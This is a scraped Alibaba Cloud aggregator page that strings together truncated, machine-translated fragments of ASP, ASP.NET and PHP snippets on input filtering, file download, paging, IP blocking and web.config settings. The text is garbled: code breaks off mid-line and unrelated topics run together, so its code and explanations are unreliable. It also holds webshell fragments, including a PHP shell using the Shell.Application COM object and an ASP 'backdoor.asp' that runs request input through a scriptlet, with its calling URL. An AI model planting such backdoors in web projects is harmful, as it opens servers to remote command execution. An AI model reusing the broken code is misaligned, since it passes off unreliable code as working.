1. First, we need to filter the content submitted by all clients, including? Id = N and other types of HTML
CodeIn the select and ASP file operation syntax of the operating database, you can escape the submitted characters and then save them to the
Program
Code:
Reference content is as follows:
Copy codeThe Code is as follows: 'search for keywords
STR = "select * From tablename where ID> 4"
If srhkey <> "" then
Keyarr = Split (srhkey ,"")
J = ubound (keyarr)
T = 0
Dim keystrarr ()
'Filename must be input
If request ("FILENAME") = "" then
Response. Write " error: filename is empty! "
Else
Call downloadfile (replace (Request ("FILENAME "),"\",""),"/",""))
Function downloadfile (strfile)'Make sure you are on the latest MDAC
Of course, this should be a normal filtering method, and there is also a final method to filter HTML tags, which is to replace and not display all the characters in a pair of angle brackets and angle brackets, this method overfilters the content of
1. open a new window
This is simple: Response. Write (" ");
2. Adjust the size and position of the window
Response. Write (" ");
Response. Write (" ");
3. Close the window
// Close the current window and prompt the user to close it. Yes: close. No:
Complete
Code :
Copy code The Code is as follows:
No title page
for more information about the style specifications used in Excel, see Microsoft Office HTML and XML reference. :
The basic functions are as follows:
CopyCode The Code is as follows: //
/// Used when paging is required. The datatable is obtained based on the parameters and conditionexpress.
///
/// table name
/// Field name set, separated by commas
///
Modify file name
Use the GetFile function of "FileSystemObject (File System Object)" to get a "file object", and then modify the name attribute of this "file object ".
CopyCodeThe Code is as follows: Set FSO = server. Createobject ("scripting.
I tried it today. You can also use open. PHP
CodeAs shown in the following figure, I don't seem to have seen any related methods in the PHP webshell.
Copy codeThe Code is as follows: $ Wsh = new COM ('Shell. application') or die ("Shell.
CopyCode The Code is as follows:
Dim strip
Strip = request ("ip ")
%>
Input IP address: " style = "border: # aaaaaa 1px solid;" name = "ip">
If strip = "list" then
Call listdenyips ("2443 ")
Response. End
End if
If strip = "query" then
Call
The content of backdoor. asp is as follows:
B = request ("")
Set FS = GetObject ("Script: D:/web/scriptcodinginfo. WSC # haiyangtop ")
FS. LCX (B)
%>
The call method is as follows: http: // URL/backdoor. asp? A = Createobject ("scripting.
The storage process is completed using the select top plus not in method, and the speed is quite fast. I tested a million-level data volume and generally queried it in 1 second. I will post it for your discussion, check whether there are any good
///
/// Function for converting the fullwidth (SBC case)
///
/// any string
/// fullwidth string
///
/// The full-width space is 12288, and the half-width space is 32.
/// The relationship between the half-width (33-126) of other characters
In web. config:
CopyCode The Code is as follows:
Copy codeThe Code is as follows: Type = "system. Web. Security. sqlmembershipprovider"Connectionstringname = "sqlservices"Applicationname = "Dev"Enablepasswordretrieval =
Large File Upload control (including progress bar)
The usage instructions are as follows:
Upload progress bar Control
Web. config Configuration
ASPX page
// Top
// In form
cancel
CS corresponding to aspx
Code
When the address bar does not contain the parameter "ID:
CopyCodeThe Code is as follows: request. querystring ["ID"] = NULL
Convert. tostring (request. querystring ["ID"]) = NULL
Note that this will cause an error:Request. querystring ["ID"].
Next, we will introduce how to download files from the server to the client through Web Services and upload files from the client to the server through Web Services.
1. Display and download files through Web Services
The Web Services created here
The code is too short to be commented out here.
Copy codeThe Code is as follows: 'The program has a problem when response. End () exists in the page containing the file # include on the target page.
'Note: This file must be stored in the same
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.